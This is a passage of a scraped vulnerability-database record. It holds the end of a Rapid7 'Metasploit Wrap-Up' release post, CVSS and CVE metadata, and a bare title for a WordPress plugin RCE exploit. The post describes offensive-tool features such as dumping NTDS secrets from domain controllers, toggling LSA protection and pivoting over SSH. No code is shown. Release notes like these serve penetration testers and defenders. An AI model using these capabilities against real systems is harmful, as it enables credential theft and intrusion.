or 2.7 to disable or enable LSA protect on a given PID (assuming the system is configured for LSA Protection). The drivers must be provided by the user.\n\n## Enhancements and features\n\n * [#15831](<https://github.com/rapid7/metasploit-framework/pull/15831>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- Established SSH connections can now leverage the pivoting capabilities of the `SshCommandShellBind` session type.\n * [#15882](<https://github.com/rapid7/metasploit-framework/pull/15882>) from [smashery](<https://github.com/smashery>) \\- An update has been made which will prevent exploits from running a payload if the exploit drops files onto the target, but the payload doesn't have the capability to clean those dropped files up from the target. Users can still override this setting by specifying `set AllowNoCleanup true` if they wish to bypass this protection.\n * [#15924](<https://github.com/rapid7/metasploit-framework/pull/15924>) from [cdelafuente-r7](<https://github.com/cdelafuente-r7>) \\- This adds the NTDS technique to the Windows Secrets Dump module, enabling it to be used against Domain Controllers. It also pulls in RubySMB changes that include many DCERPC related improvements and features.\n * [#15986](<https://github.com/rapid7/metasploit-framework/pull/15986>) from [bcoles](<https://github.com/bcoles>) \\- Module notes added to `bash_profile_persistence` now describe impacts of utilizing the module in a target environment.\n\n## Bugs fixed\n\n * [#15982](<https://github.com/rapid7/metasploit-framework/pull/15982>) from [3V3RYONE](<https://github.com/3V3RYONE>) \\- This fixes a bug where modules using the SMB client would crash when the `SMBUser` datastore option had been explicitly unset.\n * [#15984](<https://github.com/rapid7/metasploit-framework/pull/15984>) from [h00die](<https://github.com/h00die>) \\- This PR fixes a bug in the snmp library which caused it to ignore version 1, despite specifically set options.\n * [#16003](<https://github.com/rapid7/metasploit-framework/pull/16003>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- This fixes an issue with GitHub actions where the Ruby 3.1.0 version string is not yet being parsed correctly leading to automation failures.\n * [#16015](<https://github.com/rapid7/metasploit-framework/pull/16015>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This fixes a regression in tab completion for the RHOSTS datastore option.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.20...6.1.23](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-12-16T12%3A07%3A37-06%3A00..2022-01-06T10%3A44%3A33-06%3A00%22>)\n * [Full diff 6.1.20...6.1.23](<https://github.com/rapid7/metasploit-framework/compare/6.1.20...6.1.23>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-07T17:28:25", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-39352", "CVE-2021-42362", "CVE-2021-43798", "CVE-2021-44077"], "modified": "2022-01-07T17:28:25", "id": "RAPID7BLOG:104BCB9FE21AA540C50BD81151F701D5", "href": "https://blog.rapid7.com/2022/01/07/metasploit-wrap-up-144/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}

WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)

Description

Related